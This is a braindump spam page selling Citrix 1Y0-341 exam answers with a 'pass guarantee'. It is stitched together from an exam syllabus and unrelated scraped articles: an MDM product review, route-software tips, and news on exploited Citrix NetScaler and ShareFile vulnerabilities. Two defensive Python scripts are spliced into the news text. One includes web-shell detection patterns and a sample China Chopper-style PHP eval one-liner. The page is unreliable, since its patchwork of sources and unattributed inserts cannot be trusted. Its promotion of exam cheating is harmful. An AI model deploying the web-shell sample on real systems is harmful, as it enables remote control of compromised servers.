Make your day with 1Y0-341 braindumps for your exam success
Killexams.com provides legitimate, up-to-date and accurate 1Y0-341 question bank material with a 100% pass guarantee. You need to practice the questions for at least 24 hours to score high in the exam. Your real job of passing the 1Y0-341 exam begins with killexams.com practice questions.
Exam Code: 1Y0-341
Practice exam 2023 by Killexams.com team
1Y0-341 Citrix ADC Advanced Topics - Security, Management, and Optimization
Exam Specification: 1Y0-341 Citrix ADC Advanced Topics - Security, Management, and Optimization
1. Introduction to Citrix ADC Security and Optimization
- Overview of Citrix ADC and its role in security and optimization
- Understanding the importance of security management and optimization
- Exploring advanced topics related to Citrix ADC security and optimization
2. Advanced Security Features and Configuration
- Configuring advanced security policies and features
- Implementing SSL/TLS offloading and client certificate authentication
- Protecting against common web attacks using Citrix ADC
3. Traffic Optimization and Load Balancing
- Advanced traffic optimization techniques
- Load balancing configurations and algorithms
- Implementing global server load balancing (GSLB) for high availability
4. Citrix ADC Management and Troubleshooting
- Managing Citrix ADC appliances and configurations
- Monitoring and troubleshooting security and optimization issues
- Utilizing logs and diagnostic tools for problem resolution
5. Citrix ADC Security Best Practices
- Implementing security best practices for Citrix ADC deployments
- Securing Citrix ADC management interfaces and access
- Auditing and compliance considerations for Citrix ADC security
Exam Objectives:
1. Understand the role and importance of security management and optimization in Citrix ADC.
2. Configure advanced security features and policies in Citrix ADC.
3. Implement SSL/TLS offloading and client certificate authentication.
4. Protect against common web attacks using Citrix ADC.
5. Optimize traffic and load balancing using Citrix ADC.
6. Implement global server load balancing (GSLB) for high availability.
7. Manage and troubleshoot Citrix ADC appliances and configurations.
8. Monitor and troubleshoot security and optimization issues.
9. Implement security best practices for Citrix ADC deployments.
10. Secure Citrix ADC management interfaces and access.
11. Understand auditing and compliance considerations for Citrix ADC security.
Exam Syllabus:
Section 1: Introduction to Citrix ADC Security and Optimization (10%)
- Overview of Citrix ADC and its role in security and optimization
- Importance of security management and optimization
- Advanced topics in Citrix ADC security and optimization
Section 2: Advanced Security Features and Configuration (30%)
- Configuring advanced security policies and features
- Implementing SSL/TLS offloading and client certificate authentication
- Protecting against common web attacks using Citrix ADC
Section 3: Traffic Optimization and Load Balancing (20%)
- Advanced traffic optimization techniques
- Load balancing configurations and algorithms
- Implementing global server load balancing (GSLB) for high availability
Section 4: Citrix ADC Management and Troubleshooting (25%)
- Managing Citrix ADC appliances and configurations
- Monitoring and troubleshooting security and optimization issues
- Utilizing logs and diagnostic tools for problem resolution
Section 5: Citrix ADC Security Best Practices (15%)
- Implementing security best practices for Citrix ADC deployments
- Securing Citrix ADC management interfaces and access
- Auditing and compliance considerations for Citrix ADC security
Killexams : Citrix Optimization basics - BingNews
https://killexams.com/pass4sure/exam-detail/1Y0-341
https://killexams.com/exam_list/Citrix
Killexams : Citrix Endpoint Management MDM review
Formerly known as XenMobile, Citrix Endpoint Manager is a unified device management system that provides a simplified platform for IT departments to monitor and administer hardware of all types.
With features beyond the scope of standard Mobile Device Management (MDM) products, Citrix Endpoint Manager supports all commercially available mobile operating systems and desktop OSs. Offered stand-alone or as part of a more comprehensive selection of Citrix business software, Citrix Endpoint Manager aims to be seamless for the end user and effortless for the IT department to manage.
Citrix Endpoint Management is a feature-packed MDM solution(Image credit: Citrix)
Features
Citrix Endpoint Manager is an upgraded version of XenMobile, offering additional features.
In addition to the usual MDM functionalities like compliance management and application control, Citrix Endpoint Manager provides all the necessary tools for end-users to carry out their tasks. It offers a comprehensive BYOD management system with hassle-free enrollment and supports handheld scanners and similar endpoints.
The system enables easy tracking and identification of both devices and users, allowing for managing content viewed on devices (whether online or on corporate servers), deployment of software and apps, and assignment and withdrawal of permissions. The comprehensive inventory can be managed and grouped by device and other parameters, and policies can be applied and adjusted across hardware and users, all from the admin screen of Citrix Endpoint Manager.
Installation and setup
The Citrix Endpoint Manager is a powerful tool that operates seamlessly within a standard Citrix Workspace environment. It offers a comprehensive suite of tools and features for managing devices and applications within an organization.
With the ability to integrate with existing workspaces, the Endpoint Manager makes it easy to enroll devices and manage app distribution or restrictions across the network. To enroll devices, a console with all the necessary tools is provided, and end users can use the AutoDiscovery feature for enrollment, making the process simpler and reducing the workload on the MDM administrator.
An Apple Push Notifications developer account is required for Apple hardware, while Android devices require an organizational Google account and a Google Play account.
With Citrix Endpoint Manager, organizations can streamline device management processes and improve productivity and security.
Citrix Endpoint Manager works with most mobile and desktop operating systems(Image credit: Citrix)
Compatibility
Citrix Endpoint Manager offers integrated administration of Android and Android Enterprise, Chrome OS, macOS, iOS, tvOS, iPadOS, and Windows 10 devices. Only macOS and tvOS cannot be found on mobile hardware. Linux is only supported by a Citrix Ready workspace hub compatible with the Raspberry Pi 3.
Citrix Endpoint Manager can access and control these devices' management systems. So, for example, the Unified Endpoint Management capability in Windows 10 can be used to enroll and manage Windows 10 tablets and hybrids. Similarly, Citrix Endpoint Manager can access mobile device data, app information, and control security and other aspects in iOS for iPhone and iPadOS for the Apple iPad.
Additionally, Citrix Endpoint Manager supports Alexa for Business, making it the ideal choice for managing and administering mobile IoT devices and integrating those with the usual MDM hardware. Need to start a projector or dim the lights in the conference room? Those integrations can be handled from a permitted mobile device across the Citrix Endpoint Manager environment.
Usability
Citrix Endpoint Manager prioritizes both hardware and user compatibility. Rather than restricting users to specific devices, it takes a flexible approach, allowing organizations to determine the best machines, apps, and software vendors for their IT, colleagues, and overall business needs.
Citrix Workspace is a unified platform that can be accessed across devices and profiles, ensuring that users have the necessary tools on the hardware they use. Enrollment is simple and usually doesn't require repetition.
From an administrative perspective, each user and device can be easily managed through a user-friendly interface that provides analysis data. This interface allows you to monitor compliance information and device statistics by platform and carrier, and to manage device security, apps, and permissions.
Citrix's price calculator can be quite handy for larger organizations(Image credit: Citrix)
Plans and pricing
Are you looking for pricing options for Citrix? They offer different packages that can be scaled according to the needs of your business.
The Stand-alone package integrates with other Citrix products and supports major platforms and hardware. It costs $4 per user per month or $3 per device per month.
Workspace Premium is a more comprehensive solution that costs $18 per user per month. This package offers a secure interface to access apps and files, including Citrix Endpoint Manager and other notable Citrix products.
Workspace Premium Plus costs $25 per user per month and includes hybrid deployment options for Citrix Virtual Apps and Desktops, with cloud management.
To know how much Citrix Endpoint Manager may cost, visit their website, which provides a helpful calculator. Simply choose a plan, usage type, and quantity to get an estimation (actual prices may vary).
For instance, if you have 500 users and choose the Stand-alone package on a one-year contract, it would cost $4.83 per user per month. If you choose a three-year contract, you could save 20% and pay only $3.87 per user monthly.
Final verdict
When selecting a mobile device management (MDM) solution, many factors must be considered. One important consideration is the offerings provided by established players in organizational collaboration networks. Citrix Endpoint Manager is a strong contender in this space due to its wide assortment of features and tools and its straightforward device enrollment process.
If your network is already utilizing Citrix Workspace or requires an upgrade, then choosing Citrix Endpoint Manager would be a sensible decision. The necessary operating systems and server software have already been installed, and the server hardware is operational. If your budget permits, transitioning to Citrix Endpoint Manager within an existing Citrix environment may be your most appropriate option.
With its powerful management capabilities and user-friendly interface, Citrix Endpoint Manager can help streamline your organization's mobile device management processes, allowing you to focus on what matters - your business.
Whether managing a small team of mobile workers or a large enterprise with thousands of devices, Citrix Endpoint Manager has the tools and features you need to succeed. So why not try it today and see how it can help take your mobile device management to the next level?
Thu, 29 Jul 2021 02:39:00 -0500 | Bryan M Wolfe | https://www.techradar.com/reviews/citrix-endpoint-management-mdm
Killexams : Thousands of Citrix Servers Exposed to Zero-Day Bug
Over 15,000 Citrix servers worldwide are at risk of compromise unless administrators patch urgently, a leading security non-profit has warned.
The Shadowserver Foundation trawls the internet for data on malicious activity. It revealed in a Twitter post on Friday that, of the impacted servers, the largest number were based in the US (5700) followed by Germany (1500), the UK (1000) and Australia (582).
“This assessment is version based – that is we tag all IPs where we see a version hash in a Citrix instance. This is due to the fact that Citrix has removed version hash information in recent revisions, including the latest update with the fix,” the non-profit explained in a longer note on its website.
“It is thus safe to assume in our view that all instances that still provide version hashes have not been updated and thus, providing no mitigation is in place, remain vulnerable. In addition, we have also tagged as vulnerable instances that return a ‘Last-Modified’ header with a date before July 1, 2023 00:00:00Z. Make sure to update.”
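The version-based tagging Shadowserver describes can be reproduced from a saved HTTP response. The following Python is an added example written for this page, not Shadowserver's scanner or any Citrix tooling: it parses a raw HTTP/1.x response, treats an exposed version hash or a Last-Modified date before July 1, 2023 00:00:00Z as "likely unpatched", and answers "unknown" rather than guessing when neither indicator is usable. The `?v=<32 hex chars>` pattern used for the version hash is an assumption standing in for whatever marker you actually fingerprint on, and the sample responses are constructed, not real captures.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Cut-off from the Shadowserver note: a Last-Modified date before
# July 1, 2023 00:00:00Z is treated as "not updated".
CUTOFF = datetime(2023, 7, 1, tzinfo=timezone.utc)

# ASSUMPTION: placeholder for the version-hash marker older builds expose in
# the login page. Shadowserver has not published its exact fingerprint, so
# this regex stands in for whatever marker you fingerprint on.
VERSION_HASH_RE = re.compile(rb"[?&]v=([0-9a-f]{32})\b")


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("ascii", "replace")] = \
                value.strip().decode("ascii", "replace")
    return headers, body


def last_modified_utc(headers):
    """Return Last-Modified as an aware UTC datetime, or None if absent or malformed."""
    value = headers.get("last-modified")
    if not value:
        return None
    try:
        dt = parsedate_to_datetime(value)
    except (TypeError, ValueError):               # malformed date: refuse to guess
        return None
    if dt.tzinfo is None:                         # a "-0000" zone parses as naive
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def classify(raw: bytes):
    """Return (verdict, reason) using only the two version-based indicators."""
    headers, body = parse_http_response(raw)
    if VERSION_HASH_RE.search(body):
        return "likely-unpatched", "version hash still exposed in response body"
    lm = last_modified_utc(headers)
    if lm is None:
        return "unknown", "no usable Last-Modified header and no version hash"
    if lm < CUTOFF:
        return "likely-unpatched", f"Last-Modified {lm.isoformat()} is before {CUTOFF.date()}"
    return "no-indicator", "no version-based evidence (not proof that the fix is installed)"


# Constructed sample responses (not real captures).
OLD_LOGIN = (b"HTTP/1.1 200 OK\r\nLast-Modified: Mon, 19 Jun 2023 10:00:00 GMT\r\n"
             b"Content-Type: text/html\r\n\r\n<html>login</html>")
HASHED_LOGIN = (b"HTTP/1.1 200 OK\r\nLast-Modified: Fri, 21 Jul 2023 10:00:00 GMT\r\n\r\n"
                b'<script src="/vpn/js/core.js?v=' + b"a" * 32 + b'"></script>')
NEW_LOGIN = b"HTTP/1.1 200 OK\r\nLast-Modified: Fri, 21 Jul 2023 10:00:00 GMT\r\n\r\n<html>login</html>"
NO_HEADER = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>login</html>"

if __name__ == "__main__":
    for label, raw in [("old", OLD_LOGIN), ("hashed", HASHED_LOGIN),
                       ("new", NEW_LOGIN), ("no-header", NO_HEADER)]:
        print(label, *classify(raw))
```

Read the verdicts the way Shadowserver does: the two positive indicators are strong evidence that the fix is not installed, but a clean result is only the absence of evidence. An appliance can be mitigated or patched and still carry a web shell dropped before the update, so the response-level check never replaces an on-box compromise assessment.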
Citrix posted an advisory about the vulnerability (CVE-2023-3519), and two others, on July 18. The unauthenticated remote code execution bug has a CVSS score of 9.8, marking it down as critical.
It impacts NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) and emerged as a zero-day vulnerability in early July after being advertised online by a threat actor.
“Exploits of CVE-2023-3519 on unmitigated appliances have been observed,” Citrix warned. “Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.”
The two other vulnerabilities listed in the advisory are CVE-2023-3466, a reflected cross-site scripting bug, and CVE-2023-3467, which enables privilege escalation to root administrator.
Sun, 23 Jul 2023 21:00:00 -0500 | https://www.infosecurity-magazine.com/news/thousands-citrix-servers-exposed/
Killexams : About 2000 Citrix NetScalers Were Compromised in Massive Attack Campaigns
About 2,000 Citrix NetScalers were compromised in automated massive attack campaigns. Find out more about the threat actors and how to protect from them.
Threat actors have been exploiting a NetScaler appliance vulnerability to get persistent access to the compromised systems. Find out which NetScaler systems are affected, how attackers are hitting vulnerable systems worldwide and how to protect your business from this cybersecurity attack.
Exploited Citrix NetScaler vulnerability
Citrix published a security bulletin on July 18, 2023 about three vulnerabilities in NetScaler ADC and NetScaler Gateway: CVE-2023-3519, CVE-2023-3466 and CVE-2023-3467. The bulletin noted that exploits of CVE-2023-3519 had been observed in the wild on unmitigated appliances. The fixed builds are listed below; any earlier build on the same branch is affected:
NetScaler ADC and NetScaler Gateway 13.1-49.13 and later, 13.0-91.13 and later.
NetScaler ADC 13.1-FIPS 13.1-37.159 and later.
NetScaler ADC 12.1-FIPS 12.1-55.297 and later.
NetScaler ADC 12.1-NDcPP 12.1-55.297 and later.
Zscaler, a cloud security company, provided more details on how the NetScaler vulnerability can be triggered to let an unauthenticated attacker execute arbitrary code as the root user. A specially crafted HTTP GET request triggers a stack buffer overflow in the NetScaler Packet Processing Engine, which runs as root (Figure A). A proof of concept is available on GitHub.
Figure A: Example of a crafted packet containing shell code. Image: Zscaler
Exposed NetScaler appliances backdoored with web shells
Fox-IT, part of the U.K.-based information assurance firm NCC Group, responded to several incidents related to the vulnerability in July and August 2023 and found several web shells during those investigations. This is consistent with other reports, such as those from the Shadowserver Foundation, a nonprofit that works with trusted partners to make the internet more secure.
Following those discoveries, Fox-IT scanned accessible NetScalers on the internet for known web shell paths. The researchers found that approximately 2,000 unique IP addresses were probably backdoored with a webshell as of Aug. 9, 2023. Fox-IT’s discoveries were shared with the Dutch Institute for Vulnerability Disclosure, which notified administrators of the vulnerable systems.
Shadowserver reported the U.S. is the country with the most unique IPs of unpatched systems, with more than 2,600 unique IPs being vulnerable to CVE-2023-3519 (Figure B).
Figure B
Unpatched NetScaler appliances vulnerable to CVE-2023-3519 as of Aug. 5, 2023. Image: Shadowserver Foundation
Fox-IT reported that approximately 69% of the NetScalers that currently contain a web shell backdoor are not vulnerable anymore to CVE-2023-3519; this means that, while most administrators have deployed the fixes, they have not carefully checked the systems for signs of successful exploitation and are still compromised. The company provides a map of compromised NetScaler appliances by country (Figure C).
Figure C
Compromised NetScaler appliances per country. Image: Fox-IT
Most compromised NetScalers are located in Europe. Fox-IT researchers stated that “there are stark differences between countries in terms of what percentage of their NetScalers were compromised. For example, while Canada, Russia and the United States of America all had thousands of vulnerable NetScalers on July 21, virtually none of these NetScalers were found to have a webshell on them. As of now, we have no clear explanation for these differences, nor do we have a confident hypothesis to explain which NetScalers were targeted by the adversary and which ones were not.”
Successful exploitation may lead to more than just planting web shells
In addition, the Cybersecurity and Infrastructure Security Agency reported web shell implants exploiting CVE-2023-3519. The report noted that attackers exploited the vulnerability as early as June 2023 and used the web shell to extend their compromise and exfiltrate Active Directory data from a critical infrastructure organization. The threat actor accessed NetScaler configuration files and decryption keys, decrypted an AD credential stored there, and used it to query AD and exfiltrate the collected data.
While this critical infrastructure used segmentation that did not allow attackers to move further with their attacks, it is possible that other organizations might be fully compromised by threat actors using the same methods.
Dave Mitchell, chief technical officer at cybersecurity company HYAS, stated that “unfortunately, this is far from the first time this has happened in recent memory. In previous campaigns, attackers gained footholds within F5, Fortinet and VMware appliances through exposed management interfaces in order to avoid detection by EDR software. Regardless if the exploit is already in the wild, customers are expected to monitor their devices for the IOCs before and after the patch is applied — which is obviously not at an acceptable level. The reason for this gap may be education, outsourced managed devices or division of security labor within an organization, but I do not expect attacks on network devices to stop anytime soon.”
How to protect your business from this cybersecurity threat
Patch and update vulnerable Citrix NetScaler appliances now.
Check the affected systems for signs of compromise: a threat actor who got in before the patch was applied keeps their web shell afterwards, so patching alone does not evict them. Shadowserver provided command lines to detect typical web shell components in the web-exposed folders of the appliances, together with binaries running with elevated privileges. CISA provided command lines to check for files created after the last installation on the appliance.
Analyze all HTTP log files carefully. Network log files such as DNS logs and AD/LDAP/LDAPS logs should be analyzed for any anomalies or traffic spikes.
Deploy security solutions on all systems to try to detect potential malware resulting from the attack.
Keep all appliances and systems up to date and patched with multifactor authentication enabled where possible to prevent attackers from exploiting common vulnerabilities and stolen credentials.
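The compromise check in the steps above can be scripted instead of being run as one-off find commands. The Python below is an added example for this page, not CISA's or Shadowserver's published commands: it lists files under the web-exposed directories that are newer than the last install time, flags PHP files containing strings typical of one-liner web shells of the China Chopper kind, and reports setuid files anywhere under the root. The directory list is my recollection of the paths in CISA's advisory and should be checked against it before you rely on it; the web-shell patterns are a small indicative set, not a signature database; `build_sample_tree` and `demo` create a constructed sample tree so the script runs offline.

```python
import os
import re
import stat
import tempfile
from datetime import datetime, timezone

# Web-exposed, writable locations to search for files newer than the last
# install. ASSUMPTION: these are the paths CISA's advisory lists, as I recall
# them; verify against the advisory before relying on the list.
WEB_EXPOSED_DIRS = ("netscaler/ns_gui", "var/vpn", "var/netscaler/logon", "var/python")

# Strings typical of one-liner PHP web shells such as China Chopper
# (ASSUMPTION: a small indicative set, not a signature database).
SHELL_RE = re.compile(rb"@?\b(eval|assert)\s*\(\s*(\$_(POST|GET|REQUEST)|base64_decode\s*\()", re.I)


def hunt(root: str, install_time: datetime) -> dict:
    """Collect post-install files in web-exposed dirs, web-shell candidates and setuid files."""
    since = install_time.timestamp()
    found = {"new_files": [], "webshell_candidates": [], "setuid": []}
    for rel in WEB_EXPOSED_DIRS:
        for dirpath, _, names in os.walk(os.path.join(root, rel)):
            for name in names:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                if st.st_mtime > since:
                    found["new_files"].append(path)
                if name.lower().endswith(".php"):
                    with open(path, "rb") as fh:
                        if SHELL_RE.search(fh.read()):
                            found["webshell_candidates"].append(path)
    # Exploitation ran as root, so a dropped helper may be setuid: check the whole tree.
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found["setuid"].append(path)
    return found


def build_sample_tree(base: str, install_time: datetime) -> None:
    """Constructed sample image: a pre-install login page, a PHP drop written
    after the install, and a setuid helper outside the web directories."""
    t0 = install_time.timestamp()

    def put(rel, data, mtime):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (mtime, mtime))
        return path

    put("netscaler/ns_gui/vpn/index.html", b"<html>login</html>", t0 - 86400)
    put("netscaler/ns_gui/vpn/themes/help.php", b"<?php @eval($_POST['cmd']); ?>", t0 + 3600)
    helper = put("var/tmp/nsh", b"\x7fELF", t0 + 7200)
    os.chmod(helper, 0o4755)       # setuid bit; some filesystems ignore it


def demo() -> dict:
    """Build the sample tree in a temp dir, hunt it, return findings relative to the tree."""
    install_time = datetime(2023, 7, 18, tzinfo=timezone.utc)   # install date in this sample
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base, install_time)
        found = hunt(base, install_time)
        return {k: [os.path.relpath(p, base) for p in v] for k, v in found.items()}


if __name__ == "__main__":
    for key, paths in demo().items():
        print(key, paths or "-")
```

On a live appliance you would call `hunt("/", install_time)` from the shell with the time of the last firmware install; better still, run it over a copied or mounted image, since a rootkit on the box itself can hide what the on-box `find` sees. Anything in `new_files` that is not part of the upgrade, any `webshell_candidates` hit, and any setuid file you cannot tie to the firmware should be treated as a confirmed compromise, not a false positive to be explained away.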
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
Fri, 18 Aug 2023 14:28:00 -0500 | https://www.techrepublic.com/article/citrix-netscalers-compromised/
Killexams : Hundreds of Citrix Endpoints Compromised With Webshells
Around 600 global Citrix servers have been compromised by a zero-day exploit enabling webshells to be installed, according to a non-profit tracking the ongoing campaign.
The Shadowserver Foundation tweeted on 2 August that the number of impacted endpoints stood at 581, but the figure is thought to be just the tip of the iceberg.
The largest number of impacted IPs is in Germany, followed by France and Switzerland.
As reported by Infosecurity last week, the malicious campaign exploits zero-day vulnerability CVE-2023-3519 to compromise NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway servers.
The unauthenticated remote code execution vulnerability was patched by Citrix on July 18 and has a CVSS score of 9.8.
“Exploits of CVE-2023-3519 on unmitigated appliances have been observed,” Citrix warned at the time. “Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.”
At the time, Citrix also patched two other vulnerabilities: reflected cross-site scripting bug CVE-2023-3466, and CVE-2023-3467, which enables privilege escalation to root administrator.
Warning from Shadowserver
The Shadowserver Foundation, which monitors malicious internet activity across the globe, alerted Citrix users to the campaign last week. It warned that over 15,000 NetScaler ADC and NetScaler Gateway servers were at risk of compromise, with the biggest number based in the US, followed by Germany, the UK and Australia.
The zero-day was originally exploited to drop webshells onto an unnamed US critical infrastructure organization’s non-production environment, according to the US Cybersecurity and Infrastructure Security Agency (CISA).
“The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data,” it continued. “The actors attempted to move laterally to a domain controller but network segmentation controls for the appliance blocked movement.”
That attack happened back in June 2023.
Wed, 02 Aug 2023 21:00:00 -0500 | https://www.infosecurity-magazine.com/news/hundreds-citrix-compromised/
Killexams : Hackers exploit Citrix zero-day to target US critical infrastructure
Thousands of companies could be at risk from an actively exploited Citrix zero-day that hackers have already abused to target at least one critical infrastructure organization in the United States.
Citrix last week sounded the alarm about the critical-rated flaw, tracked as CVE-2023-3519 with a severity rating of 9.8 out of 10, which impacts NetScaler ADC and NetScaler Gateway devices. These enterprise-facing products are designed for secure application delivery and providing VPN connectivity, and are used extensively worldwide, particularly within critical infrastructure organizations.
Citrix warned that the zero-day could allow an unauthenticated, remote attacker to run arbitrary code on a device and said it has evidence that the vulnerability was exploited in the wild. Citrix released security updates for the vulnerability on July 18 and is urging customers to install the patches as soon as possible.
Days after Citrix’s warning, U.S. cybersecurity agency CISA revealed that the vulnerability had been exploited against a U.S. critical infrastructure organization in June, and was reported to the agency earlier in July.
CISA said that hackers exploited the flaw to drop a webshell on the organization’s NetScaler ADC appliance, enabling them to collect and exfiltrate data from the organization’s Active Directory, including information about users, groups, applications and devices on the network. But because the targeted appliance was isolated within the organization’s network, the hackers were unable to move laterally and compromise the domain controller.
While this organization successfully managed to ward off the hackers targeting its systems, thousands of other organizations could be at risk. The Shadowserver Foundation, a nonprofit organization that works to make the internet more secure, said it has found more than 15,000 Citrix servers worldwide at risk of compromise unless patches are applied.
The largest number of unpatched servers are based in the U.S. (5,700), followed by Germany (1,500), the U.K. (1,000) and Australia (582), according to their analysis.
It’s not yet known who is behind the exploitation of this vulnerability, but Citrix vulnerabilities have been known to be exploited by both financially motivated cybercriminals and state-sponsored threat actors, including groups linked to China.
In a blog post published over the weekend, researchers at Mandiant said that while they cannot yet attribute the intrusions to any known threat group, the activity is “consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADCs in 2022.” Mandiant added that the intrusions are likely part of an intelligence-gathering campaign, noting that espionage-motivated threat actors continue to target technologies that do not support endpoint detection and response solutions, such as firewalls, IoT devices, hypervisors and VPNs.
“Mandiant has investigated dozens of intrusions at defense industrial base (DIB), government, technology, and telecommunications organizations over the years where suspected China-nexus groups have exploited zero-day vulnerabilities and deployed custom malware to steal user credentials and maintain long-term access to the victim environments,” the researchers said.
Mon, 24 Jul 2023 03:08:00 -0500 | https://techcrunch.com/2023/07/24/citrix-zero-day-critical-infrastructure/
Killexams : The Best Route Optimization Software Of 2023
You’ve already taken a terrific first step in exploring the best options for route optimization software by reviewing this Forbes list of top solutions. Still, we recognize that this is an important decision for your company, and selecting the best routing solution will require additional considerations to ensure you make the right choice for your organization.
Consider Who on Your Team Will Be Using the Software
The size and composition of your team will be a factor that impacts your choice of routing software. You need to consider the people who will use the software, too.
You want to choose software that is user-friendly for your drivers. Comfort with technology varies greatly, and hence, it’s best to choose a routing software that requires a minimal level of technical proficiency. Selecting software that’s easy to use makes initial deployment go more smoothly, prevents mistakes down the road and helps ensure that drivers hired after the initial deployment can quickly be trained on the software.
You also want to consider user-friendliness for dispatchers or other administrative staff who will use the routing software. Involving future software administrators and dispatchers in the software evaluation process will help you identify issues and opportunities that would not come to light without others’ feedback.
Try Out the Software Before You Buy It
Several top routing software providers offer free trials, including Onfleet, RoadWarrior and Motive. If a routing solution you’re interested in has a free trial, take advantage of that opportunity to get a feel for how the software would work for your team.
If a free trial is not available, schedule a personal demonstration of the software so you can ask questions about how the software handles your unique needs. You can also ask the solution provider to give you references, so you can contact other software users directly and ask about their overall satisfaction.
Consider Your Budget
The pricing for routing software varies greatly. Software with basic features can be obtained for free or a few dollars a month; other solutions cost hundreds or even thousands per month.
Many providers don’t publish their rates because there are so many factors involved in delivering a precise price quote. Pricing is typically based on the number of user deployments, the variety of features included and the complexity of the routing requirements. Most providers offer add-on features, and those can add up.
Going with a solution that can scale up or down with you as your needs change is a wise way to ensure you’re not overpaying for routing software services.
Killexams : Initial Citrix ShareFile RCE exploitation commences
Attacks leveraging a critical remote code execution bug in Citrix ShareFile, tracked as CVE-2023-24489, were observed by GreyNoise to have begun early last week, SecurityWeek reports. "GreyNoise has observed IPs attempting to exploit this vulnerability. Two have never seen GreyNoise before this activity," said GreyNoise. The flaw, which was patched in June, could be exploited for total application compromise, according to Citrix. Meanwhile, Assetnote, which identified and reported the flaw, said that the bug stemmed from several errors that allow unauthenticated file uploads. "Although the [vulnerable] endpoint is not enabled in all configurations, it has been common amongst the hosts we have tested. Given the number of instances online and the reliability of the exploit, we have already seen a big impact from this vulnerability," said Assetnote, which released initial proof-of-concept code earlier this month before publishing further PoC exploits. Citrix ShareFile users are urged to apply the updates immediately.
Mon, 31 Jul 2023 05:28:00 -0500 | https://www.scmagazine.com/brief/initial-citrix-sharefile-rce-exploitation-commences
Killexams : CISA says hackers are exploiting a new file transfer bug in Citrix ShareFile
Hackers are exploiting a newly discovered vulnerability in yet another enterprise file transfer software, the U.S. government’s cybersecurity agency has warned.
CISA on Wednesday added a vulnerability in Citrix ShareFile, tracked as CVE-2023-24489, to its Known Exploited Vulnerabilities (KEV) catalog. The agency warned that the flaw poses “significant risks to the federal enterprise,” and mandated that federal civilian executive branch agencies — CISA included — apply vendor patches by September 6.
Citrix first released a warning about the vulnerability back in June. The flaw, which was given a vulnerability severity rating of 9.8 out of 10, is described as an improper access control bug that could allow an unauthenticated attacker to remotely compromise customer-managed Citrix ShareFile storage zones controllers, no passwords needed.
While Citrix ShareFile is predominantly a cloud-based file-transfer tool, it also provides a “storage zones controller” tool that enables organizations to store files on-premise or with supported cloud platforms, such as Amazon S3 and Windows Azure.
According to Dylan Pindur of Assetnote, who first discovered the vulnerability and warned that it stems from small errors in ShareFile’s implementation of AES encryption, as many as 6,000 organizations had publicly exposed instances as of July.
“A search online shows roughly 1,000-6,000 instances are internet accessible,” said Pindur. “This popularity, combined with the software being used to store sensitive data, meant if we found anything it could have quite an impact.”
Threat intelligence startup GreyNoise said it observed a “significant spike” in attacker activity after CISA published its warning about the ShareFile vulnerability.
The identity of the hackers behind the observed in-the-wild attacks is not yet known.
Corporate file-transfer software has become a popular target for hackers as these systems often store huge batches of highly sensitive data.
The Russia-linked Clop ransomware gang alone has claimed responsibility for targeting at least three corporate tools, including Accellion's FTA, Fortra's GoAnywhere MFT and, most recently, Progress' MOVEit Transfer.
According to the latest data from cybersecurity company Emsisoft, the ongoing MOVEit mass-attacks have so far claimed 668 victim organizations, affecting more than 46 million individuals. Just this week, it was revealed that more than four million Americans had their sensitive medical and health information stolen after IBM fell victim to the MOVEit hackers.
Thu, 17 Aug 2023 00:31:00 -0500, https://techcrunch.com/2023/08/17/cisa-hackers-citrix-sharefile-exploit/
Over 640 Citrix servers backdoored with web shells in ongoing attacks
Hundreds of Citrix Netscaler ADC and Gateway servers have already been breached and backdoored in a series of attacks targeting a critical remote code execution (RCE) vulnerability tracked as CVE-2023-3519.
Security researchers from the Shadowserver Foundation, a non-profit organization dedicated to improving internet security, have now disclosed that attackers deployed web shells on at least 640 Citrix servers in these attacks.
"We can say it's fairly standard China Chopper but we do not want to disclose more under the circumstances. I can say the amount we detect is much lower than the amount we believe to be out there, unfortunately," Shadowserver CEO Piotr Kijewski told BleepingComputer.
"We report on compromised appliances with webshells in your network (640 for 2023-07-30). We are aware of widespread exploitation happening July 20th already," Shadowserver said on their public mailing list.
"If you did not patch by then please assume compromise. We believe the actual amount of CVE-2023-3519 related webshells to be much higher than 640."
About two weeks ago, the count of Citrix appliances vulnerable to CVE-2023-3519 attacks stood at around 15,000. However, that number has since dropped to under 10,000, indicating some progress in mitigating the vulnerability.
Citrix released security updates on July 18th to address the RCE vulnerability, acknowledging that exploits had been observed on vulnerable appliances and urging customers to install the patches without delay.
The vulnerability primarily impacts unpatched Netscaler appliances configured as gateways (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication virtual servers (AAA server).
In addition to addressing CVE-2023-3519, Citrix also patched two other high-severity vulnerabilities the same day, CVE-2023-3466 and CVE-2023-3467, which could be exploited for reflected cross-site scripting (XSS) attacks and privilege escalation to root.
The CISA warning also highlighted that the vulnerability had already been exploited to breach the systems of a U.S. critical infrastructure organization.
"In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization's NetScaler ADC appliance," CISA said.
"The webshell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement."
